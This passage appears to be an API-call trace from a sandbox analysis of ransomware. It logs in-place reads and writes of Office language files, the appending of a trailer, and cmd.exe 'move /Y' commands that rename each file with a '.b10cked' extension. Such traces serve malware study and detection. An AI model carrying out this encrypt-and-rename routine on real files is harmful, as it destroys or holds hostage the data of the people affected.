lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.320] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0174.321] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0174.321] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.322] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.322] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0174.322] SetFilePointer (in: hFile=0x120, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0174.322] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.397] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.535] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0174.538] SetFilePointer (in: hFile=0x120, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0174.538] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.538] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.538] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0174.538] SetFilePointer (in: hFile=0x120, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0174.538] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.662] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.663] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0174.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 
[0174.665] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.665] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.666] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0174.666] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf0b60 [0174.666] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.761] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.762] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0174.763] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf0b60 [0174.763] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 
[0174.764] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.764] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0174.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0174.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0174.769] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x110b60 [0174.769] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0174.769] CloseHandle (hObject=0x120) returned 1 [0174.802] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX") returned 0x3c [0174.803] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 
[0174.804] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd7c, dwThreadId=0xe60)) returned 1 [0174.850] CloseHandle (hObject=0x1b4) returned 1 [0174.850] CloseHandle (hObject=0x120) returned 1 [0174.850] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.850] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.850] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0174.850] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.850] ReleaseMutex (hMutex=0xf8) returned 1 [0174.850] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0174.850] ReleaseMutex (hMutex=0xf8) returned 1 [0174.850] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.850] ReleaseMutex (hMutex=0xf8) returned 1 [0174.850] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.850] ReleaseMutex (hMutex=0xf8) returned 1 [0174.851] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23164025759) returned 1 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.853] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.853] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.853] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x23478 [0174.853] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0174.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0174.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0174.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x23960 [0174.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x23960 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0174.874] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0174.874] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.881] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2caf, lpOverlapped=0x0) returned 1 [0174.883] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0174.883] WriteFile (in: hFile=0x120, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.883] WriteFile (in: hFile=0x120, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2caf, lpOverlapped=0x0) returned 1 [0174.883] SetFilePointer (in: hFile=0x120, lDistanceToMove=-72879, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x11cb1 [0174.884] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.884] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2caf, lpOverlapped=0x0) returned 1 [0174.885] SetFilePointer (in: hFile=0x120, lDistanceToMove=-72879, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x11cb1 [0174.885] WriteFile (in: hFile=0x120, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.885] WriteFile (in: hFile=0x120, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2caf, lpOverlapped=0x0) returned 1 [0174.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0174.890] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x23960 [0174.890] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0174.890] CloseHandle (hObject=0x120) returned 1 [0174.893] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX") returned 0x3c [0174.894] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0174.895] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe38, dwThreadId=0x638)) returned 1 [0174.918] CloseHandle (hObject=0x1b4) returned 1 [0174.918] CloseHandle (hObject=0x120) returned 1 [0174.918] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.918] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.918] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL 